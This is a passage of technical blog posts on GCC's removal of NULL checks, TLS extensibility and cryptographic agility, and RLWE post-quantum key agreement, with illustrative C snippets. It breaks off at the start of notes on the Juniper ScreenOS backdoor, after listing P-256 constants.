To try and figure out the impact that this optimisation is having I built a number of open-source programs with GCC 6.1.1, with -fno-builtin (to disable GCC's built-in versions of these functions) and with glibc's string.h including, or not, the nonnull annotations. For example, the snippet of code above produces this diff when tested this way:

0000000000000000 <f>:
-   0:	48 83 ec 08          	sub    rsp,0x8
+   0:	53                   	push   rbx
+   1:	48 89 fb             	mov    rbx,rdi
    4:	e8 00 00 00 00       	call   9 <f+0x9>
    9:	31 c0                	xor    eax,eax
-   b:	48 83 c4 08          	add    rsp,0x8
-   f:	c3                   	ret    
+   b:	48 85 db             	test   rbx,rbx
+   e:	0f 94 c0             	sete   al
+  11:	5b                   	pop    rbx
+  12:	c3                   	ret    

The added code tests dest to set the return value, as intended.

The first program I tested was BIND 9.9.5 because of this advisory that says: “GCC now includes (by default) an optimization which is intended to eliminate unnecessary null pointer comparisons in compiled code. Unfortunately this optimization removes checks which are necessary in BIND and the demonstrated effect is to cause unpredictable assertion failures during execution of named, resulting in termination of the server process”. Although version 9.9.5 should be affected according to the advisory, I found no differences in the compiled output based on nonnull annotations in string.h. Perhaps it's because I'm using a different GCC, perhaps I just got something wrong in my testing, or perhaps these checks were eliminated for different reasons. (For example, a local root exploit in the kernel was enabled by a dereference-based removal of a NULL check.)

Next up, I tried something that I'm more involved with: BoringSSL. Here there are two changes: a reordering of two conditions in OPENSSL_realloc_clean (which has no semantic effect) and extensive changes in BN_mod_exp_mont. I'm sure I would be able to do a better analysis if I were more experienced with disassembling large programs, but I'm just using objdump and diff. Still, I believe that all the changes are the result of a single NULL check being removed and then the resulting offset shift of all the following code. That counts as an optimisation, but it's statically clear that the pointer cannot be NULL even without any assumptions about string.h functions so I struggle to give much credit.

Since BoringSSL showed some changes, I tried OpenSSL 1.0.2h. This also shows the same large changes around BN_mod_exp_mont. There's also a large change in dsa_builtin_paramgen2 (a function that we don't have in BoringSSL) but that appears to be another insignificant NULL-check removed and a consequent change of all the later offsets. Lastly, there are a handful of no-op changes: like swapping the arguments to cmp before jne.

Next I tried openssh-7.2p2, which shows no changes. I wondered whether someone had already done this analysis and corrected any problems in OpenSSH so tried a much older version too: 5.4p1. That does show a small, but non-trivial, change in ssh_rsa_verify. After a bit of thought, I believe that GCC has managed to eliminate a test for a non-NULL pointer at the end of openssh_RSA_verify. Just like the BoringSSL case, it's already possible to deduce that the pointer must be non-NULL without any section 7.1.4 assumptions.

Conclusions

It's clear that one has to write C code that's resilient to the compiler assuming that any pointers passed to standard library functions are non-NULL. There have been too many releases of glibc and GCC with this in to safely assume that it'll ever go away.
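One defensive pattern is to make sure that memcpy is never reached with a zero length, since that's the case in which callers most plausibly pass NULL. The following is a minimal sketch of that idea; the name copy_bytes is made up for this example and isn't taken from any of the programs tested above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* copy_bytes is a hypothetical wrapper around memcpy. It never calls memcpy
 * with a zero length, so a (NULL, NULL, 0) call never reaches a function that
 * section 7.1.4 says must not be given NULL. */
void *copy_bytes(void *dest, const void *src, size_t n) {
  if (n == 0) {
    return dest;
  }
  /* With a non-zero length, a NULL pointer is a genuine caller bug. */
  assert(dest != NULL && src != NULL);
  return memcpy(dest, src, n);
}
```

Because the zero-length path returns before memcpy, a later dest == NULL test isn't something that the compiler can discard for that path on the basis of the memcpy call alone.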

However, the benefits of this (i.e. the optimisations that the compiler can perform because of it) are nearly zero. Large programs can be built where it has no effect. When there are changes they are either cases that the compiler should have been able to figure out anyway, or else noise changes with no effect.

As for the costs: there have been several cases where removing NULL checks has resulted in a security vulnerability, although I can't find any cases of this precise corner of the C standard causing it. It also adds a very subtle, exceptional case to several very common functions, burdening programmers. But it thankfully rarely seems to make a difference in real-life code, so hopefully there's not a large pool of bugs in legacy code that have been created by this change.

Still, given the huge amount of legacy C code that exists, this optimisation seems unwise to me. Although I've little hope of it happening, I'd suggest that GCC and glibc remove these assumptions and that the next revision of the C standard change 7.24.1(2) to clarify that when a length is zero, pointers can be NULL.

If anyone wishes to check my results here, I've put the scripts that I used on GitHub. I'm afraid that it takes a bit of manual setup and, given variation in GCC versions across systems, some differences are to be expected but the results should be reproducible.

Cryptographic Agility

(These are notes that I wrote up from a talk that I gave at the National Academies Forum on Cyber Resilience. You can tell that it was in Washington, DC because of the “cyber”.

I wasn't quite sure how technical to pitch this talk so it's relatively introductory; regular readers probably know all this.

This isn't a transcript of what I said, but I try to hit the main points in my notes.)

Firstly I'd like to separate extensibility from agility. A protocol is extensible if you can add features to it without having to update every implementation at the same time—which is generally impossible. Cryptographic agility depends on having extensibility, at least if you ever want to use something that wasn't designed into a protocol at the beginning.

Protocols should be extensible: the world keeps changing and no design is going to be perfect for all time. But extensibility is much harder in practice than it sounds.

I happen to be particularly familiar with TLS and TLS has two, major extensibility mechanisms. The first is a simple version number. Here's how the specification says that it should work:

Client: I support up to version 1.2.

Server: (calculates the minimum of the version that the client supports and the maximum version that the server supports) Ok, let's use version 1.1.

This is commendably simple: it's not possible to express a range of versions and certainly not a discontinuous range. This is about as simple as an extensibility mechanism could be, and yet lots of implementations get it wrong. It's a common mistake for implementations to return an error when the client offers a version number that they don't understand.

This, of course, means that deploying new versions doesn't work. But it's insidious because the server will work fine until someone tries to deploy a new version. We thought that we had flexibility in the protocol but it turned out that bugs in code had rusted it in place.
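The negotiation itself is tiny. As a sketch (the function name is invented here, and a real server would also enforce a minimum version, which is omitted), the server's whole job is to take the smaller of two numbers and never to reject a number just because it's unfamiliar:

```c
#include <assert.h>
#include <stdint.h>

/* Wire encodings of TLS versions: 1.0 is 0x0301, 1.1 is 0x0302 and 1.2 is
 * 0x0303. */
enum {
  TLS1_VERSION = 0x0301,
  TLS1_1_VERSION = 0x0302,
  TLS1_2_VERSION = 0x0303,
};

/* negotiate_version returns the version that the server should select. A
 * client version that is higher than anything the server knows about is not
 * an error: the server simply answers with its own maximum. */
uint16_t negotiate_version(uint16_t client_max, uint16_t server_max) {
  return client_max < server_max ? client_max : server_max;
}

/* Example: a client offering a version that this server has never heard of
 * still gets a working connection at the server's maximum. */
void negotiate_version_example(void) {
  assert(negotiate_version(0x0304, TLS1_2_VERSION) == TLS1_2_VERSION);
}
```

The common mistake described above amounts to replacing the comparison with an equality test against a list of known versions and failing when nothing matches.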

At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed. If Chrome updates and then something stops working then Chrome gets the blame. It doesn't matter that the server couldn't correctly calculate the minimum of two numbers. No normal person understands or cares about that.

What's to be done about this? Well, we work around issues if they're big and suck up the breakage if they're small. It's taken about 15 years to get to the point where web browsers don't have to work around broken version negotiation in TLS and that's mostly because we only have three active versions of TLS. When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.

TLS has a second, major extension mechanism which is a series of (key, value) pairs where servers should ignore unknown keys. This has worked a little better because, while there are only three or four versions in play, with many years between versions, there are 25 to 30 extensions defined. It's not perfect: bugs in implementations have led them to be dependent on the order of extensions and somebody at least managed to write a server that breaks if the last value is empty.
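To make the "ignore unknown keys" rule concrete, here is a sketch of walking a block of extensions, each encoded as a two-byte type, a two-byte length and then the value. The function name and the idea of merely counting known extensions are illustrative assumptions; a real parser would dispatch to per-extension handlers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The one extension that this hypothetical server understands. (Zero is the
 * code point for server_name.) */
enum { EXT_SERVER_NAME = 0 };

/* count_known_extensions walks |len| bytes of extensions. It returns one on
 * success and zero if the encoding is malformed. Unknown types are skipped,
 * and neither the order of the extensions nor an empty final value is
 * treated as an error. */
int count_known_extensions(const uint8_t *in, size_t len, size_t *out_known) {
  assert(out_known != NULL && (in != NULL || len == 0));
  size_t known = 0;
  while (len > 0) {
    if (len < 4) {
      return 0; /* truncated header */
    }
    uint16_t type = (uint16_t)((in[0] << 8) | in[1]);
    size_t value_len = ((size_t)in[2] << 8) | in[3];
    in += 4;
    len -= 4;
    if (value_len > len) {
      return 0; /* value runs past the end of the buffer */
    }
    if (type == EXT_SERVER_NAME) {
      known++;
    }
    /* Any other type is unknown: skip its value rather than failing. */
    in += value_len;
    len -= value_len;
  }
  *out_known = known;
  return 1;
}
```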

Sometimes more extensibility points have been added inside of extensions in the expectation that it'll save adding another, top-level extension in the future. This has generally been a mistake: these extension points have added complexity for little reason and, when we try to use them, we often find that bugs have rusted them solid anyway. They've just been a waste.

There's a lesson in all this: have one joint and keep it well oiled.

Protocol designers underestimate how badly people will implement their designs. Writing down how you think it should work and hoping that it'll work, doesn't work. TLS's protocol negotiation is trivial and the specification is clear, yet it still didn't work in practice because it's difficult to oil.

Rather one needs to minimise complexity, concentrate all extensibility in a single place and actively defend it. An active defense can take many forms: fuzzing the extensibility system in test suites and compliance testing is good. You might want to define and implement dummy extensions once a year or such, and retire old ones on a similar schedule. When extensions contain lists of values, define a range of values that clients insert at random. In short, be creative otherwise you'll find that bug rust will quickly settle in.
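As one possible shape for the "insert values at random" idea, a client could add a reserved, meaningless value at a random position in each list that it sends. This is only a sketch: DUMMY_VALUE is a hypothetical code point and the caller is assumed to supply the random number.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* DUMMY_VALUE is a hypothetical code point that is reserved so that it never
 * means anything. Peers must ignore it like any other unknown value. */
enum { DUMMY_VALUE = 0x0a0a };

/* insert_dummy inserts DUMMY_VALUE into |list|, which holds |n| entries and
 * has room for |cap|, at a position derived from the random value |r|. It
 * returns the new number of entries. If the list is full, it is unchanged. */
size_t insert_dummy(uint16_t *list, size_t n, size_t cap, uint32_t r) {
  assert(list != NULL && n <= cap);
  if (n == cap) {
    return n;
  }
  size_t pos = r % (n + 1);
  if (pos < n) {
    /* Shift the tail of the list up by one entry to make room. */
    memmove(&list[pos + 1], &list[pos], (n - pos) * sizeof(list[0]));
  }
  list[pos] = DUMMY_VALUE;
  return n + 1;
}
```

A peer that breaks on the dummy value, or that depends on its position, then fails immediately rather than years later when a real value is added.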

Agility itself

Cryptographic agility is a huge cost. Implementing and supporting multiple algorithms means more code. More code begets more bugs. More things in general means less academic focus on any one thing, and less testing and code-review per thing. Any increase in the number of options also means more combinations and a higher chance for a bad interaction to arise.

Let's just consider symmetric ciphers for a moment. Because everyone wants them to be as fast as possible, BoringSSL currently contains 27 thousand lines of Perl scripts (taken from OpenSSL, who wrote them all) that generate assembly code just in order to implement AES-GCM. That's a tremendous amount of work and a tremendous scope for bugs.

Focusing again on TLS: over the years, 25 different ciphers and modes have been specified for use in TLS. Thankfully, of those, only nine are actively used. But that doesn't mean that the zombies of the others might not still be lurking around, ready to cause problems.

Where did this mess of diversity come from?

1. Old age / we had no idea what we were doing in the 1990's:

3DES_EDE_CBC AES_128_CBC AES_256_CBC DES40_CBC
DES_CBC DES_CBC_40 IDEA_CBC NULL
RC2_CBC_40 RC4_128 RC4_40

A lot of mistakes were made in the 1990's—we really didn't know what we were doing. Phil Rogaway did, but sadly not enough people listened to him; probably because they were busy fighting the US Government which was trying to ban the whole field of study at the time. Unfortunately that coincided with the early inflation period of the internet and a lot of those mistakes were embedded pretty deeply. We're still living with them today.

2. National pride cipher suites

ARIA_128_CBC ARIA_128_GCM ARIA_256_CBC ARIA_256_GCM
CAMELLIA_128_CBC CAMELLIA_128_GCM CAMELLIA_256_CBC CAMELLIA_256_GCM
SEED_CBC

The next cause of excess agility is the national pride cipher suites. Many countries consider cryptography to be an area of national interest but then mistakenly believe that means that they have to invent their own standards and primitives. South Korea and Japan were especially forthright about this and so managed to get these ciphers assigned code points in TLS but Russia and China and, to some extent, many other countries do the same thing.

Although they receive limited analysis compared to something like AES, they're generally not bad, per se, but they bring nothing new to the table: they add nothing but costs, and the costs are significant. Cryptographic diversity for the sake of national pride should be strenuously resisted for that reason. Other countries may complain that the US got their standards widely used but the US got to specify a lot about the internet by being the first mover. (And AES is from Belgium anyway.) However, I'm not aware of any of these national standards being used to promote something that's actually a deliberate backdoor; which is, of course, not true of the US.

3. Reasonable cases for diversity:

  • Embedded systems want to minimise circuit size: AES_128_CCM and AES_256_CCM.
  • We want something faster for when we don't have AES hardware: CHACHA20_POLY1305.
  • US Government standard, got hardware support from Intel: AES_128_GCM and AES_256_GCM.

Now we come to the ones that are reasonable to use and the reasons for diversity there. It's all about performance optimisation for different environments really: tiny devices want CCM because it only needs an AES-encrypt circuit. Devices without hardware support for AES-GCM want to use ChaCha20-Poly1305 because it's much more efficient in software. Everything else wants to use AES-GCM.

Agility has allowed us to introduce the ciphers in the final set and that's really important. But it's equally important to kill off the old stuff, and that's very hard. Nearly all the incentives are aligned against it. Recall the Law of the Internet (mentioned above); users hate stuff breaking and always blame you. Even djb will take to Twitter when one drops DSA support.

We have a long conveyor belt of primitives, we put new ones at the front and, every so often, we turn the crank and something drops off the end. In addition to all the obvious problems with killing off old stuff, that also means that there are a lot of inadvisable options that will generally function at any given time and this is leading to new products launching with no idea that they're sitting towards the end of this conveyor belt. These products expect a lifetime of some number of years and are unaware that we hope to discontinue something that they're using much sooner than that. Because of new launches, we can no longer assume that waiting a year will reduce the amount of use that a deprecated primitive gets.

Google tries to address this where it can by requiring support for the newest options in our certification process for devices that interact with our services. But only a tiny subset of the things that interact with Google go through any of our certifications.

Things are even harder in non-interactive cases. TLS at least gets to negotiate between the client and server but algorithms in S/MIME messages and certificate signatures don't allow that. (One can think of ways to help change that, but the current reality is that they're not negotiated.) That's why dropping SHA-1 support in certificates has been such a gruesome fight and why PKCS#8 messages still require us to support 40-bit RC2.

So what's the lesson here? I'd say that you need extensibility but, when it comes to cryptographic agility, have one option. Maybe two. Fight to keep it that small.

It's worth highlighting that, for the purposes of time, I've simplified things dramatically. I've considered only symmetric ciphers and modes above but, even within TLS, there's a whole separate conveyor belt for asymmetric algorithms. And I've not mentioned the oncoming storm of quantum computers. Quantum computers are going to be hilarious and I hope to be retired before they get big enough to cause problems!

Post-quantum key agreement

If large quantum computers can be built (and not of the D-Wave variety) then they'll make quite a mess of public-key cryptography. RSA and systems based on discrete logarithms (i.e. finite-field and elliptic-curve Diffie-Hellman) are all broken. I've written about hash-based signatures (which resist quantum attacks) before and the recent PQCRYPTO recommendations suggest those for signatures and McEliece for public-key encryption. Those are both sound, conservative recommendations but both have some size problems: McEliece public keys can be on the order of a megabyte of data and conservative hash-based signatures are about 40KB.

In some situations that's not a problem, and things like firmware signatures, where the key is embedded in hard-to-change silicon, should consider using hash-based signatures today. But those costs motivate the search for post-quantum schemes that are closer to the small, fast primitives that we have today.

One candidate is called Ring Learning-With-Errors (RLWE) and I'll try to give a taste of how it works in this post. This is strongly based on the A New Hope paper by Alkim, Ducas, Pöppelmann & Schwabe, and, in turn, on papers by Bos, Costello, Naehrig & Stebila and Peikert.

Firstly, the basic stats (because I always hate having to dig around for these values in papers). I've included the numbers for a current, elliptic-curve based Diffie-Hellman scheme (X25519) for comparison:

                            A New Hope          X25519
Alice's transmission size   1,824 bytes [a]     32 bytes
Alice's computation         129,638 cycles [b]  331,568 cycles [c]
Bob's transmission size     1,824 bytes         32 bytes
Bob's computation           126,236 cycles      331,568 cycles

([a] This is using a more compact scheme than in the paper. [b] These are Haswell cycle counts from the paper. [c] These are values from the SUPERCOP benchmark on titan0.)

Something to keep in mind when looking at the numbers above: sending 1,824 bytes on a 10MBit link takes 5.1 million cycles, assuming that your CPU is running at 3.5GHz.
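That figure is just the transmission time multiplied by the clock rate. A small helper (the name is made up for this example) makes it easy to redo the sum for other link speeds:

```c
#include <assert.h>
#include <stdint.h>

/* transmit_cycles returns the number of CPU cycles that pass while |bytes|
 * bytes are clocked onto a link of |link_bits_per_sec|, for a CPU running at
 * |cpu_hz|. It ignores latency and framing overhead, and it assumes that the
 * intermediate product fits in 64 bits. */
uint64_t transmit_cycles(uint64_t bytes, uint64_t link_bits_per_sec,
                         uint64_t cpu_hz) {
  assert(link_bits_per_sec != 0);
  return bytes * 8 * cpu_hz / link_bits_per_sec;
}
```

For example, transmit_cycles(1824, 10000000, 3500000000) gives the roughly 5.1 million cycles quoted above, which dwarfs the computation costs in the table.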

RLWE key agreement

Our fundamental setting is ℤ_12289[X]/(X^1024+1). That's the set of polynomials where the largest power of x is 1023 and the coefficients are values between zero and 12288 (inclusive). For example, 66 + 4532x + 10000x^2 + … + 872x^1023.

Addition and multiplication can be defined for polynomials in this set. Addition is done by matching up powers of x and adding the corresponding coefficients. If the result is out of range then it's reduced modulo 12289.

Multiplication is high-school polynomial multiplication where the polynomial on the right is multiplied by every term of the polynomial on the left and the result is the sum of those terms. Coefficients are reduced modulo 12289 to keep them in range, but it's likely that the resulting powers of x will be too large: multiplying two x^1023 terms gives a result in terms of x^2046.

Polynomials with too large a degree can be reduced modulo x^1024+1 until they're in range again. So, if we ended up with a term of a×x^2046 then we could subtract a×x^1022(x^1024+1) to eliminate it, leaving −a×x^1022 in its place. By repeated application of that trick, all the terms with powers of x greater than 1023 can be eliminated and then the result is back in the set.
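The two operations can be sketched directly from those descriptions. This is the slow, schoolbook version with the reduction folded into the multiplication loop, not the transform-based method that real implementations use; the names are invented for this example.

```c
#include <assert.h>
#include <stdint.h>

enum { N = 1024, Q = 12289 };

/* poly_add sets out = a + b, coefficient by coefficient, modulo Q. */
void poly_add(uint16_t out[N], const uint16_t a[N], const uint16_t b[N]) {
  for (int i = 0; i < N; i++) {
    assert(a[i] < Q && b[i] < Q);
    out[i] = (uint16_t)((a[i] + b[i]) % Q);
  }
}

/* poly_mul sets out = a * b modulo x^N + 1, with coefficients modulo Q. */
void poly_mul(uint16_t out[N], const uint16_t a[N], const uint16_t b[N]) {
  uint32_t acc[N] = {0};
  for (int i = 0; i < N; i++) {
    for (int j = 0; j < N; j++) {
      uint32_t prod = ((uint32_t)a[i] * b[j]) % Q;
      int k = i + j;
      if (k < N) {
        acc[k] = (acc[k] + prod) % Q;
      } else {
        /* x^N is -1 modulo x^N + 1, so a term in x^k becomes a negated term
         * in x^(k-N). Adding Q - prod subtracts prod modulo Q. */
        acc[k - N] = (acc[k - N] + Q - prod) % Q;
      }
    }
  }
  /* Only write the output at the end so that out may alias a or b. */
  for (int i = 0; i < N; i++) {
    out[i] = (uint16_t)acc[i];
  }
}
```

Multiplying x^1023 by itself with this code leaves a coefficient of 12288 (i.e. −1) on x^1022, matching the worked reduction above.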

Now that we can add and multiply within this set of polynomials we need to define a noise polynomial: this is simply a polynomial where each coefficient is sampled from a random distribution. In this case, the distribution will be a centered binomial distribution that ranges from -12 to 12. The probability density looks like this:

[Figure: probability density of the noise distribution, plotted over the range -15 to 15.]

An important feature of noise polynomials is that the magnitude of each coefficient is small. That will be critical later on.
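One standard way to sample a centered binomial distribution is to take the difference between the number of set bits in two equal-sized groups of random bits. The sketch below assumes that the range of -12 to 12 corresponds to two groups of twelve bits; it isn't necessarily how the paper's code does it, and the caller is assumed to supply bits from a cryptographically secure source.

```c
#include <assert.h>
#include <stdint.h>

/* count_low_12_bits returns the number of set bits among the low 12 bits. */
int count_low_12_bits(uint32_t v) {
  int count = 0;
  for (int i = 0; i < 12; i++) {
    count += (int)((v >> i) & 1);
  }
  return count;
}

/* sample_noise turns the low 24 bits of |random_bits| into one noise
 * coefficient in the range -12 to 12. Values near zero are the most likely
 * because most bit patterns have similar counts in each group. */
int sample_noise(uint32_t random_bits) {
  int noise =
      count_low_12_bits(random_bits) - count_low_12_bits(random_bits >> 12);
  assert(noise >= -12 && noise <= 12);
  return noise;
}
```

A negative result would be stored as 12289 plus the value when it's used as a coefficient.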

A random polynomial is one where each coefficient is sampled from a uniform distribution over the full range of zero to 12288.

To build a Diffie-Hellman protocol from this, Alice generates a random polynomial, a, and two noise polynomials, s and e. Alice calculates b = as+e and sends a and b to Bob. Bob generates his own s′ and e′, uses Alice's a to calculate u = as′+e′, and sends u back to Alice. Now Alice can calculate us = (as′+e′)s = as′s+e′s and Bob can calculate bs′ = (as+e)s′ = ass′+es′. But the keen-eyed will notice that those are different values!

The added noise is necessary for security but it means that the two sides to this protocol calculate different values. But, while the values are different, they're very similar because the magnitude of the noise polynomials is small. So a reconciliation mechanism is needed to find a shared value given two, similar polynomials.
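To see how close the two values end up, here is a toy version of the exchange with four coefficients rather than 1024, so that it can be checked by hand. Everything here (the names, the tiny size, passing the noise in as arguments) is an assumption made for illustration and offers no security.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

enum { TOY_N = 4, Q = 12289 };

/* toy_mul sets out = a * b in Z_Q[x]/(x^TOY_N + 1). */
void toy_mul(int32_t out[TOY_N], const int32_t a[TOY_N],
             const int32_t b[TOY_N]) {
  int64_t acc[TOY_N] = {0};
  for (int i = 0; i < TOY_N; i++) {
    assert(a[i] >= 0 && a[i] < Q && b[i] >= 0 && b[i] < Q);
    for (int j = 0; j < TOY_N; j++) {
      int64_t prod = (int64_t)a[i] * b[j];
      if (i + j < TOY_N) {
        acc[i + j] += prod;
      } else {
        acc[i + j - TOY_N] -= prod; /* x^TOY_N is -1 */
      }
    }
  }
  for (int k = 0; k < TOY_N; k++) {
    out[k] = (int32_t)(((acc[k] % Q) + Q) % Q);
  }
}

/* toy_mul_add sets out = a * s + e. */
void toy_mul_add(int32_t out[TOY_N], const int32_t a[TOY_N],
                 const int32_t s[TOY_N], const int32_t e[TOY_N]) {
  toy_mul(out, a, s);
  for (int k = 0; k < TOY_N; k++) {
    out[k] = (out[k] + e[k]) % Q;
  }
}

/* circle_distance is the distance between x and y when the values 0..Q-1
 * are arranged in a circle. */
int32_t circle_distance(int32_t x, int32_t y) {
  int32_t d = abs(x - y);
  return d < Q - d ? d : Q - d;
}

/* max_disagreement runs both sides of the exchange and returns the largest
 * distance between corresponding coefficients of Alice's and Bob's values. */
int32_t max_disagreement(const int32_t a[TOY_N], const int32_t s[TOY_N],
                         const int32_t e[TOY_N], const int32_t s2[TOY_N],
                         const int32_t e2[TOY_N]) {
  int32_t b[TOY_N], u[TOY_N], alice[TOY_N], bob[TOY_N];
  toy_mul_add(b, a, s, e);   /* Alice sends b = as + e */
  toy_mul_add(u, a, s2, e2); /* Bob sends u = as' + e' */
  toy_mul(alice, u, s);      /* Alice computes us */
  toy_mul(bob, b, s2);       /* Bob computes bs' */
  int32_t max = 0;
  for (int k = 0; k < TOY_N; k++) {
    int32_t d = circle_distance(alice[k], bob[k]);
    if (d > max) {
      max = d;
    }
  }
  return max;
}
```

With noise coefficients limited to -1, 0 and 1 (where -1 is stored as Q - 1), each coefficient of e′s and es′ has magnitude at most four, so the two sides can differ by at most eight out of a range of 12289.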

Reconciliation

So far I've been following the A New Hope paper and it does include a reconciliation mechanism. But, to be honest, I'm not sure that I understand it, so I'm going to be describing a mechanism by Peikert here:

The reconciliation will treat each coefficient in the similar polynomials separately and will extract a single, shared bit from each. Since we're dealing with polynomials that have 1024 terms, we'll get a 1024-bit shared secret in total but I'm just going to describe how a single coefficient is processed to get a single bit.

Consider the coefficient space as a circle: zero and 12289 are the same value modulo 12289 and we put that at the top of the circle. At the bottom of the circle will be 12289/2 = 6144 (rounding down). We know that, for each coefficient, Alice and Bob will have similar values—meaning that the values will be close by on the circle.

[Figure: the coefficient space drawn as a circle, with 0 at the top and 6144 at the bottom.]

One option is to split the circle into left and right halves and say that if the point is in the left half then it's a zero, otherwise it's a one.

[Figure: the circle split into left and right halves, labelled 0 and 1.]

But while that will work most of the time, there's obviously a problem when the points are near the top or the bottom. In these cases, a small difference in location can result in a point being in a different half, and thus Alice and Bob will get a different result.

In this case we want to split the circle into top (zero) and bottom (one), so that both points are clearly in the bottom half.

[Figure: the circle split into top and bottom halves, labelled 0 and 1.]

But that just moves the problem around to the left and right edges of the circle. So how about we vary the basis in which we measure the points depending where they are? If the point is near the bottom or the top we'll use the top–bottom (blue) basis and, if not, we'll use the left–right (red) basis.

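[Figure: the circle divided into blue regions near the top and bottom and red regions near the left and right, with two nearby points marked on either side of a boundary between regions.]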

But there's still a problem! Consider the two points in the diagram just above. One party will think that it's in a red area, measure it left–right and conclude that the shared bit is a zero. The other will think it's in a blue area, measure it top–bottom and conclude that the shared bit is a one.

There isn't a solution to this in which the parties operate independently so, instead, one of the parties chooses the basis in which each coefficient will be measured. That choice is a single bit per coefficient (i.e. red or blue), which we have Bob send to Alice along with his value u. With this reconciliation information in hand, both parties can measure their points in the same, optimal basis and calculate the same, shared value.
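For a single coefficient, the description above can be sketched as follows. This follows the prose here rather than the exact construction in either paper, and two details are assumptions: that values increase clockwise around the circle (so 1 to 6143 sit in the right half), and that "near the top or bottom" means within an eighth of the circle.

```c
#include <assert.h>
#include <stdlib.h>

enum { Q = 12289 };
enum basis { BASIS_LEFT_RIGHT = 0, BASIS_TOP_BOTTOM = 1 };

/* circle_distance is the distance between x and y around the circle. */
int circle_distance(int x, int y) {
  int d = abs(x - y);
  return d < Q - d ? d : Q - d;
}

/* choose_basis is run by Bob on his own coefficient. It picks the basis whose
 * dividing line is furthest from his point: top/bottom when the point is near
 * the top or the bottom, and left/right otherwise. */
enum basis choose_basis(int v) {
  assert(v >= 0 && v < Q);
  int to_top = circle_distance(v, 0);
  int to_bottom = circle_distance(v, Q / 2);
  int nearest = to_top < to_bottom ? to_top : to_bottom;
  return nearest < Q / 8 ? BASIS_TOP_BOTTOM : BASIS_LEFT_RIGHT;
}

/* extract_bit is run by both parties with the basis that Bob chose. */
int extract_bit(int v, enum basis basis) {
  assert(v >= 0 && v < Q);
  if (basis == BASIS_TOP_BOTTOM) {
    /* Top half is zero, bottom half is one. */
    return circle_distance(v, 0) < circle_distance(v, Q / 2) ? 0 : 1;
  }
  /* Left half is zero, right half is one (assuming clockwise values). */
  return v < Q / 2 ? 1 : 0;
}
```

Bob's point is always at least roughly Q/8 from the dividing line of the basis that he picks, so Alice extracts the same bit as long as her value is closer to his than that.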

Optimisations

There's lots in the paper that I've skipped over here. Most importantly (for performance), a variant of the Fourier transform can be used to convert the polynomials into the frequency domain where multiplication is much faster. Some of the values transmitted can be transmitted in the frequency domain too to save conversions overall. Also, random polynomials can be sampled directly in the frequency domain.

The parameters here have also been carefully selected so that the reduction stage of multiplication happens magically, just by point-wise multiplication by some constants before and after the transform.

The a value that Alice generates could be a global constant, but in order to save worrying about how it was generated, and to eliminate the possibility of all-for-the-price-of-one attacks (like LogJam), it's generated fresh for each instance. Rather than transmit it in full, Alice need only send a seed value for it to Bob.

Contrasts with Diffie-Hellman

The most important change from Diffie-Hellman is that this scheme requires that all values be ephemeral. Both QUIC and TLS 1.3 assume that a Diffie-Hellman public-value can be reused but, in this scheme, that breaks the security of the system. More traditional uses of Diffie-Hellman, e.g. TLS 1.2 and SSH, are fine though.

Another important change is that this scheme takes a full round-trip for Alice. With Diffie-Hellman, both parties can transmit a message at time zero and as soon as the other party has received the message, they can calculate the shared key and start transmitting. But even if the a value is a global constant in this scheme, the reconciliation process means that Bob can't send a message until he's received Alice's message, and Alice can't calculate the shared key until she has received Bob's message. So Alice has to wait a full round-trip.

Often that limitation isn't important because other parts of the protocol already require the round-trip (for example, in TLS). But for some uses it's a critical difference.

Also, since this protocol involves random noise it has a failure probability: it's possible that the reconciliation mechanism produces different answers for each side. Thankfully this probability can be made negligible (i.e. less than one in 2^64).

I should also note that the RLWE problem is hypothesised to be resistant to quantum attack, but we don't know that. We also don't know that it's resistant to attacks by classical computers! It's possible that someone will develop a classical algorithm tomorrow that breaks the scheme above. Thus it should be used concurrently with a standard Diffie-Hellman (e.g. X25519) and the outputs of each should be concatenated as the input keying material for a KDF.
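The combination step is only a concatenation. In this sketch the function name and the order (Diffie-Hellman output first) are assumptions, and the KDF itself is left to whatever library is in use:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* concat_secrets writes dh_secret followed by pq_secret to |out| and returns
 * the total length, or zero if |out_cap| is too small. The result is meant
 * to be fed to a KDF as input keying material, never used as a key directly.
 * An attacker then has to break both schemes to learn the KDF's input. */
size_t concat_secrets(uint8_t *out, size_t out_cap, const uint8_t *dh_secret,
                      size_t dh_len, const uint8_t *pq_secret, size_t pq_len) {
  assert(out != NULL && dh_secret != NULL && pq_secret != NULL);
  if (dh_len > out_cap || pq_len > out_cap - dh_len) {
    return 0;
  }
  if (dh_len > 0) {
    memcpy(out, dh_secret, dh_len);
  }
  if (pq_len > 0) {
    memcpy(out + dh_len, pq_secret, pq_len);
  }
  return dh_len + pq_len;
}
```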

Juniper: recording some Twitter conversations

Update: Ralf wrote up some notes from his work. These now include an update themselves with information from Willem Pinckaers that suggests that the presumed Dual-EC output is exposed to the world in Juniper devices.

On Thursday, Juniper announced that some of their products were affected by “unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen® devices and to decrypt VPN connections”. That sounds like an attacker managed to subvert Juniper's source code repository and insert a backdoor. Of course, any glimpses that we get of these sorts of attacks are fascinating.

Juniper followed up with a slightly more detailed post that noted that there were two backdoors: one via SSH and one that “may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic”. Either of these would be very interesting to a nation-state attacker but the latter (passive decryption of VPN connections) is really in their neighborhood.

So, of course, smarter people than I quickly took to Twitter to pull apart the differences in the fixed firmware versions. Since Twitter conversations are terrible to try and pick apart after the fact, I'm writing down the gist of things here. But I'm just the scribe in this case; other people did the work.

One of the first things that people focused on was a difference to a large, hex value that was visible by just diffing the strings of the two firmwares. That change is interesting not just because it's a large, opaque hex string in a binary, but because of the hex strings that immediately precede it. Specifically, they were:

  • FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF: this is the prime order of the underlying field of P-256, a standard elliptic curve.
  • FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC: P-256 is typically written in short-Weierstrass form: y^2 = x^3 + ax + b. This is then the a value for P-256.
